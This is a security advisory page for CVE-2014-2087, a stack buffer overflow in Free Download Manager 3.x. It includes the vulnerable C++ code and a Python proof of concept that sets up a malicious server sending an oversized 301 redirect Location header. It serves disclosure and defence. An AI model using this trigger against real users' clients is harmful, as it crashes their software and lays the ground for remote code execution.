what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Free Download Manager 3.x Buffer Overflow

Free Download Manager 3.x Buffer Overflow
Posted Mar 14, 2014
Authored by Julien Ahrens | Site rcesecurity.com

Free Download Manager versions 3.9.3 build 1360, 3.8 build 1173, 3.0 build 852, and possibly others are affected by a stack-based buffer overflow vulnerability. Proof of concept code included.

tags | exploit, overflow, proof of concept
advisories | CVE-2014-2087
SHA-256 | d757234aa82969bb55c4498cb2fc25d5a4f629a3efd5fc1a69edf4175c7a988a

Free Download Manager 3.x Buffer Overflow

Change Mirror Download
RCE Security Advisory
http://www.rcesecurity.com


1. ADVISORY INFORMATION
-----------------------
Product: Free Download Manager
Vendor URL: www.freedownloadmanager.org
Type: Stack-based Buffer Overflow [CWE-121]
Date found: 2014-02-20
Date published: 2014-02-13
CVSSv2 Score: 9,3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
CVE: CVE-2014-2087


2. CREDITS
----------
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.


3. VERSIONS AFFECTED
--------------------
Free Download Manager v3.9.3 build 1360 (latest)
Free Download Manager v3.8 build 1173
Free Download Manager v3.0 build 852
and other older versions may be affected too.


4. VULNERABILITY DESCRIPTION
----------------------------
A stack-based buffer overflow vulnerability has been identified in the
Free Download Manager.

The application parses download requests, which are added to the
download queue, but does not properly validate the length of the
complete download queue object when it’s removed from the queue by the
user. The following function from fdm.exe (source file:
Downloads_Deleted.cpp) is triggered on deletion:

void CDownloads_Deleted::UpdateDownload(int iItem)

This function reads the filename of the download object using
CDownloads_Tasks::GetFileName into szFile and adds the whole URL value
as a description (in brackets) via an insecure strcat() sequence to
szFile during the queue deletion process.

Since the application follows HTTP 301 redirects, an attacker who
controls the target HTTP server is able to send arbitrary long filename
values to exploit this flaw. If the complete name of the queued download
exceeds the size of szFile (10000 bytes), strcat() writes outside the
expected memory boundaries.

This leads to a stack-based buffer overflow with an overwritten SEH
chain or return points, resulting in remote code execution. Successful
exploits can allow remote attackers to execute arbitrary code with the
privileges of the user running the application. Failed exploits will
result in a denial-of-service condition.

This vulnerability is also exploitable locally via "File->Import->Import
list of downloads"


5. VULNERABLE CODE PART
-----------------------
// Downloads_Deleted.cpp

void CDownloads_Deleted::UpdateDownload(int iItem)
{
vmsDownloadSmartPtr dld = (fsDownload*)GetItemData (iItem);

CHAR szFile [10000];
CDownloads_Tasks::GetFileName (dld, szFile);
lstrcat (szFile, " (");
lstrcat (szFile, dld->pMgr->get_URL ());
lstrcat (szFile, ")");
SetItemText (iItem, 0, szFile);
[..]
}


6. PROOF-OF-CONCEPT (PYTHON)
----------------------------
#!/usr/bin/python
from socket import *
from time import sleep

host = "192.168.0.1"
port = 80

s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print "\n[+] Listening on %d ..." % port

cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]

junk0 = "\x43" * 9000

payload = junk0

buffer = "HTTP/1.1 301 Moved Permanently\r\n"
buffer += "Date: Thu, 20 Feb 2014 11:31:08 GMT\r\n"
buffer += "Server: Apache/2.2.22 (Debian)\r\n"
buffer += "Location: "+ payload + "\r\n"
buffer += "Vary: Accept-Encoding\r\n"
buffer += "Content-Length: 8000\r\n"
buffer += "Keep-Alive: timeout=5, max=100\r\n"
buffer += "Connection: Keep-Alive\r\n"
buffer += "Content-Type: text/html; charset=iso-8859-1\r\n"
buffer += "\r\n"
buffer += "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n"
buffer += "<html><head>\n"
buffer += "<title>301 Moved Permanently</title>\n"
buffer += "</head><body>\n"
buffer += "<h1>Moved Permanently</h1>\n"
buffer += "<p>The document has moved <a
href=\""+payload+"\">here</a>.</p>\n"
buffer += "</body></html>\n"

print cl.recv(1000)
cl.send(buffer)
print "[+] Sending buffer: OK\n"

sleep(1)
cl.close()
s.close()


7. SOLUTION
-----------
None


8. REPORT TIMELINE
------------------
2014-02-20: Discovery of the vulnerability
2014-02-21: Vendor Notification #1 with preset disclosure date (2014-03-09)
2014-02-24: MITRE assigns CVE-2014-2087
2014-02-25: Vendor Notification #2
2014-02-26: Vendor Notification #3
2014-03-05: Vendor Response
2014-03-05: Vulnerability details sent to vendor
2014-03-09: RCE Security asks for a status update
2014-03-13: No response from vendor
2014-03-13: Full Disclosure according to disclosure policy


9. REFERENCES
-------------
http://www.rcesecurity.com/2014/03/cve-2014-2087-free-download-manager-cdownloads_deleted-updatedownload-remote-code-execution
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close